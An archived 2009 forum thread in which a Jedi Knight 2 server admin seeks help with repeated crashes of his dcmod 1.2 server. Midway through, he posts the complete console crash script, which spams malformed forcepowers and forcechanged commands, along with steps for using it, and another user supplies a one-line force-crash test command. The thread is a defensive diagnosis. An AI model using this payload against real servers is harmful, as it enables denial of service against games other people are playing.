Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 15:09

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 17 posts ] 
Author Message
 Post subject: dc mod vulnerability?
PostPosted: 22 Jun 2009 02:59 

Joined: 22 Jul 2008 02:26
Posts: 14
hello again...

i have a JK2 server and clan , it's one of the last populated servers in jk2, and I m running dcmod v1.2 .

There are some guys that have a script or something that restart the server, everytime they want it.
When server is populated , they just come and restart.
I m wondering if you guys know how i can fix that


Top
 Profile  
 
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 22 Jun 2009 09:20 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
what of the work-arounds on http://aluigi.org/patches.htm#quake3 have you applied?
I don't know this mod or jk2 so it's possible that there is also a bug affecting this specific mod.


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 22 Jun 2009 20:09 

Joined: 22 Jul 2008 02:26
Posts: 14
I applied all patches.
Yes this script only works on dcmod 1.2.

I dont know what to do , nobody wants to share that script with me , and they keep restarting my server


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 23 Jun 2009 02:15 

Joined: 21 Feb 2009 15:32
Posts: 8
It looks like the mod has some stages of admin rcon, post you cfg with all cvars, you can change your rcon cvars later


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 23 Jun 2009 16:34 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
evan1715 wrote:
--DS-Online v1.32 is vulnerable to name crash/glitch.
--DC Mod v1.2 is vulnerable to flood.
--Jedi Academy Mod 1.6 is vulnerable to flood, name crash, force crash and fake players.

userinfo flood - rapid changing of a clients userinfo, overflowing the server causing lag and potential crashing
fix: get a different mod o_O


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 23 Jun 2009 17:31 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
a generic useful suggestion valid for any field is to check ever the date of the latest version of a software/game/mod and verifying that it's still supported by its author and how much it's supported (for example if the author replies soon to the reports of the users and fixes the problems immediately).

using an old software or an old thirdy part component it's the first way to get problems (and from what I have seen this dc mod no longer has a homepage and it's closed source)


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 26 Jun 2009 20:19 

Joined: 22 Jul 2008 02:26
Posts: 14
I got my hands on the script that does this .

I'd prefere not to post it on the forum since all remaining jk2 servers use dcmod... so if anybody visits ...

shd i pm u luigi?


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 26 Jun 2009 20:26 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
personally I'm not interest in this for various reasons (old unsupported mod, usually the bugs in these mods are hard/boring to fix, general lack of interest and so on).


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 29 Jun 2009 22:05 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
darthboss wrote:
I got my hands on the script that does this .

I'd prefere not to post it on the forum since all remaining jk2 servers use dcmod... so if anybody visits ...

shd i pm u luigi?

u should pm me it and ill tell u if i can help u with it

u can't prevent the spread of this 'script' it will get out to the general public of jk2 1.04 and it will be used, just like every other exploit

and no, i wont be passing it around either.


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 03 Jul 2009 19:02 

Joined: 22 Jul 2008 02:26
Posts: 14
bind "p" "vstr crash00"
set crash00 " vstr crash01; vstr crash01; vstr crash01; wait 250; vstr crash02; vstr crash02; vstr crash02"
set crash01 " -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7"
set crash02 " forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged"


This is the script.

It works like this.

You go spec , exec the script , then join game with these force variables.
And it crashes the server.


It works on most dcmod servers.... but not all.. some have fix already.

The servers with FIX , dont let you join game with those force variables , it asks you to fill the force points.


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 03 Jul 2009 22:17 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
ok, this looks like force crash... but extreme version lol.
so let's go ahead and try and see if ur version of dcmod is fixed against force crash
go into your server, open your console and type in
/set forcepowers 1337;wait 1;forcechanged
kill urself and respawn.....
if u respawn with no server crash, i want u to do the same method people are using with this.
go to spec, go ahead and bind it and do it repeatedly and then join.

if the server does not crash with the regular force crash, ur mod is protected, but apparently not from this one :P
so the mod is probably a very basic protection and these people cheated the system and found a bug in the patch.

so go ahead and test it on ur version of dcmod and tell me ur results and we'll go on from there xD
also, if it doesn't crash with the command line given above, give me ur ip to ur server so i can test some stuff


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 00:50 

Joined: 22 Jul 2008 02:26
Posts: 14
it crashed.
i did that command , when i killed myself i was spec.
when i rejoined game , server crashed.

78.143.19.186:4002


this is my server.
thanks for the help , I owe you a beer


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 02:25 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
ah so ur version of dcmod is not fixed from force crash :P
it's a very common crash people use :P
does dcmod have an open source so the bug can be fixed through code?


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 09:17 

Joined: 22 Jul 2008 02:26
Posts: 14
Well DCMOD is a Pk3 + server.cfg

I can send you the pk3 and the cfg


what about this...

http://gamall-ida.com/f/download/file.p ... 57bc453512


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 10:20 

Joined: 22 Jul 2008 02:26
Posts: 14
NVM , PROBLEM SOLVED , I REPLACED THE PK3 WITH SOME OF A FRIEND.
DCMOD.PK3 , AND IT DOESNT CRASH IT NOW.

THANKS FOR EVERYTHING.


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 04 Jul 2009 16:08 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
uhmmm so basicly you used a multiplayer server mod from an untrusted source (the so called "friends" are the first cause of security problems) without knowing what it really changes or who created it... wow, and then people wonder why they get "hacked" (meaningless word that many people like to use for anything) eh eh eh :)


Top
 Profile  
 
 Post subject: Re: dc mod vulnerability?
PostPosted: 06 Jul 2009 04:14 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
uh ok cool, i suppose.

calm down luigi :)


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 17 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: